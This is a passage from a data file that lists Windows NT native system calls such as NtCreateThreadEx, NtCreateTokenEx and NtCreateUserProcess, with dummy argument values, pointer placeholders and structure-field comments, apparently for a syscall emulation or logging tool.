\"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE hOrgToken (dummy handle, typically a real token handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to HANDLE LowBoxToken (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct91\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (unnamed token)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateRegistryTransaction\": {\r\n \"ntFunc\": \"NtCreateRegistryTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F003F\",\r\n \"additionalComment\": \"DesiredAccess (KEY_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE RegistryHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateThreadEx\": {\r\n \"ntFunc\": \"NtCreateThreadEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID AttributeList (None, defaulted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00200000\",\r\n \"additionalComment\": \"MaximumStackSize (2MB typical)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"StackSize (1MB typical)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ZeroBits (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000004\",\r\n \"additionalComment\": \"CreateFlags (THREAD_CREATE_FLAGS_CREATE_SUSPENDED)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Argument (None, defaulted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00401000\",\r\n \"additionalComment\": \"PVOID StartRoutine (entry point address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F03FF\",\r\n \"additionalComment\": \"DesiredAccess (THREAD_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE ThreadHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateTimer2\": {\r\n \"ntFunc\": \"NtCreateTimer2\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0010001F\",\r\n \"additionalComment\": \"DesiredAccess (TIMER_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Attributes (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Unknown1 (None, defaulted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE TimerHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateTokenEx\": {\r\n \"ntFunc\": \"NtCreateTokenEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_SOURCE TokenSource (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_SOURCE\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"SourceName and SourceIdentifier fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_DEFAULT_DACL DefaultDacl (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_DEFAULT_DACL\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Default discretionary ACL for the token.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_PRIMARY_GROUP PrimaryGroup (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_PRIMARY_GROUP\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Primary group SID.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_OWNER Owner (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_OWNER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Owner SID.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_MANDATORY_POLICY\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Mandatory policy settings.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_GROUPS DeviceGroups (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_GROUPS\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Device group SIDs.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_SECURITY_ATTRIBUTES_INFORMATION DeviceAttributes (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_SECURITY_ATTRIBUTES_INFORMATION\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Device security attributes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_SECURITY_ATTRIBUTES_INFORMATION UserAttributes (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_SECURITY_ATTRIBUTES_INFORMATION\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"User security attributes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_PRIVILEGES Privileges (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_PRIVILEGES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Token privileges.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_GROUPS Groups (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_GROUPS\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Group SIDs.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PTOKEN_USER User (None, defaulted)\",\r\n \"structurePointer\": \"TOKEN_USER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"User SID.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER ExpirationTime (None, defaulted)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Expiration time as a 64-bit integer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLUID AuthenticationId (None, defaulted)\",\r\n \"structurePointer\": \"LUID\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Locally unique identifier.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TokenType (TokenPrimary)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F01FF\",\r\n \"additionalComment\": \"DesiredAccess (TOKEN_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE TokenHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateUserProcess\": {\r\n \"ntFunc\": \"NtCreateUserProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID AttributeList (None, defaulted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID CreateInfo (None, defaulted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PRTL_USER_PROCESS_PARAMETERS ProcessParameters (None, defaulted)\",\r\n \"structurePointer\": \"RTL_USER_PROCESS_PARAMETERS\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Process parameters structure.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ThreadFlags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ProcessFlags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ThreadObjectAttributes (None, defaulted)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ProcessObjectAttributes (None, defaulted)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0FFF\",\r\n \"additionalComment\": \"ThreadDesiredAccess (THREAD_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0FFF\",\r\n \"additionalComment\": \"ProcessDesiredAccess (PROCESS_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE ThreadHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to HANDLE ProcessHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateWaitablePort\": {\r\n \"ntFunc\": \"NtCreateWaitablePort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00010000\",\r\n \"additionalComment\": \"ULONG MaxPoolUsage (example: 64KB)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000400\",\r\n \"additionalComment\": \"ULONG MaxMsgLength (example: 1024 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG MaxConnectionInfoLength (example: 64 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, defaulted)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional: Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE PortHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateWnfStateName\": {\r\n \"ntFunc\": \"NtCreateWnfStateName\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PSECURITY_DESCRIPTOR SecurityDescriptor (None, defaulted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional security descriptor pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG MaximumStateSize (example: 4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID TypeId (None, defaulted)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional GUID pointer for type.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN PersistData (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG DataScope (WnfDataScopeSession)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000003\",\r\n \"additionalComment\": \"ULONG Lifetime (WnfTemporaryStateName)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to C WNF_STATE_NAME StateName (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDebugContinue\": {\r\n \"ntFunc\": \"NtDebugContinue\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xC000013A\",\r\n \"additionalComment\": \"NTSTATUS Status (example: STATUS_CONTROL_C_EXIT)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PCLIENT_ID ClientId (None, defaulted)\",\r\n \"structurePointer\": \"CLIENT_ID\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional pointer to CLIENT_ID structure.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE DebugHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDeleteBootEntry\": {\r\n \"ntFunc\": \"NtDeleteBootEntry\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Name (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct92\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure with buffer pointing to boot entry name.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct92\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length in bytes (16 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0040\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0040\",\r\n \"fieldComment\": \"Pointer to boot entry name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDeleteDriverEntry\": {\r\n \"ntFunc\": \"NtDeleteDriverEntry\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Name (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct93\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure with buffer pointing to driver entry name.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct93\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0018\",\r\n \"fieldComment\": \"Length in bytes (12 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum buffer size in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0050\",\r\n \"fieldComment\": \"Pointer to driver entry name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtDeleteWnfStateData\": {\r\n \"ntFunc\": \"NtDeleteWnfStateData\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ExplicitScope (None, default scope)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xaabbccdd\",\r\n \"additionalComment\": \"PCWNF_STATE_NAME StateName (example state name value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDeleteWnfStateName\": {\r\n \"ntFunc\": \"NtDeleteWnfStateName\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xaabbccdd\",\r\n \"additionalComment\": \"PCWNF_STATE_NAME StateName (example state name value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDirectGraphicsCall\": {\r\n \"ntFunc\": \"NtDirectGraphicsCall\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Unknown (example nonzero value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG Unknown (example nonzero value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000003\",\r\n \"additionalComment\": \"ULONG Unknown (example nonzero value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000004\",\r\n \"additionalComment\": \"ULONG Unknown (example nonzero value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000005\",\r\n \"additionalComment\": \"ULONG Unknown (example nonzero value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFilterBootOption\": {\r\n \"ntFunc\": \"NtFilterBootOption\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG DataSize (example: 16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PVOID Data (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG ElementType (example: 1, e.g., BootApplication)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG ObjectType (example: 2, e.g., BootObject)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000003\",\r\n \"additionalComment\": \"ULONG FilterOperation (example: 3, e.g., FilterDelete)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFilterToken\": {\r\n \"ntFunc\": \"NtFilterToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PHANDLE NewTokenHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PTOKEN_GROUPS RestrictedSids (dummy pointer, typically None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PTOKEN_PRIVILEGES PrivilegesToDelete (dummy pointer, typically None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PTOKEN_GROUPS SidsToDisable (dummy pointer, typically None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ExistingTokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n 